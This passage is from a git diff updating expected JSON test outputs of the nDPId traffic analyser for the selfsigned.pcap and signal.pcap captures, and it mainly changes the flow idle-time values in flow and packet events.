{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} +01039{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":2634,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1588921646517} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/signal.pcap.out b/test/results/signal.pcap.out index 177f818ce..255336672 100644 --- a/test/results/signal.pcap.out +++ b/test/results/signal.pcap.out @@ -6,132 +6,132 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569051247593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569051247593,"pkt":"xiwDYGpkxGGLNYKpCABFAABHd8wAAP8RvnbAqAIRwKgCAe15ADUAM\/YJyvgBAAABAAAAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569051247599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247599,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN66AbtonqfVAAAAALAC\/\/\/ZywAAAgQFtAEDAwcBAQgKKFVR7gAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247600,"flow_last_seen":1569051247600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247600,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569051247600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247600,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd67AbuyrbdxAAAAALAC\/\/+b2AAAAgQFtAEDAwcBAQgKKFVR7wAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247601,"flow_last_seen":1569051247601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569051247601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247601,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd68AbvGwW2DAAAAALAC\/\/\/RsAAAAgQFtAEDAwcBAQgKKFVR8AAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569051247599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247599,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN66AbtonqfVAAAAALAC\/\/\/ZywAAAgQFtAEDAwcBAQgKKFVR7gAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247600,"flow_last_seen":1569051247600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247600,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569051247600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247600,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd67AbuyrbdxAAAAALAC\/\/+b2AAAAgQFtAEDAwcBAQgKKFVR7wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247601,"flow_last_seen":1569051247601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569051247601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247601,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd68AbvGwW2DAAAAALAC\/\/\/RsAAAAgQFtAEDAwcBAQgKKFVR8AAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569051247630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569051247630,"pkt":"xGGLNYKpxiwDYGpkCABFAABXR+wAAEARrUfAqAIBwKgCEQA17XkAQwp5yviBgAABAAEAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA8ABBc5GBA="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} 